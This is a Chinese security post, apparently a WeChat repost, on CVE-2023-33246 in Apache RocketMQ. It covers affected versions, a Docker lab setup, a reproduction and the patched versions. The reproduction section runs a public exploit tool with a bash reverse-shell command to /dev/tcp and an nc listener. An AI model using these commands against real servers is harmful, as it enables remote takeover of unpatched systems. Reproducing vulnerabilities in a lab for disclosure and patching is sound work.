0x01 前言
0x02 漏洞描述
0x03 影响版本
Apache RocketMQ <= 5.1.0Apache RocketMQ <= 4.9.5
0x04 环境搭建
下载docker镜像:docker pull apache/rocketmq:4.9.1docker pull apacherocketmq/rocketmq-console:2.0.0
启动namesrv:docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
启动broker服务(先创建并配置broker文件)
创建broker文件目录mkdir -p /NDTSec/rocketmq/conf/配置broker文件vim /NDTSec/rocketmq/conf/broker.conf将下面内容复制粘贴到broker.conf配置文件中:brokerClusterName = DefaultClusterbrokerName = broker-abrokerId = 0deleteWhen = 04fileReservedTime = 48brokerRole = ASYNC_MASTERflushDiskType = SYNC_FLUSH
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv-e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876-Dcom.rocketmq.sendMessageWithVIPChannel=false"-t apacherocketmq/rocketmq-console:2.0.0
0x05 漏洞复现
环境搭建成功页面是这个酱紫
直接利用Github上大佬写好的工具反弹shell:
https://github.com/Serendipity-Lucky/CVE-2023-33246
java -jar CVE-2023-33246.jar -ip "1.1.1.1" -cmd "bash -i >& /dev/tcp/4.4.4.4/1122 0>&1"
PS:自己本地测试的时候,反弹shell的ip不能与docker启动环境的ip一样,不然接收不到shell
NC监听:
nc -lvnp 1122
0x06 修复方案
目前官方已发布安全修复更新,受影响用户可以升级到 Apache RocketMQ 5.1.1或者4.9.6建议及时更新至最新版本
原文始发于微信公众号(渗透Xiao白帽):漏洞速递| CVE-2023-33246 RCE漏洞(附EXP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论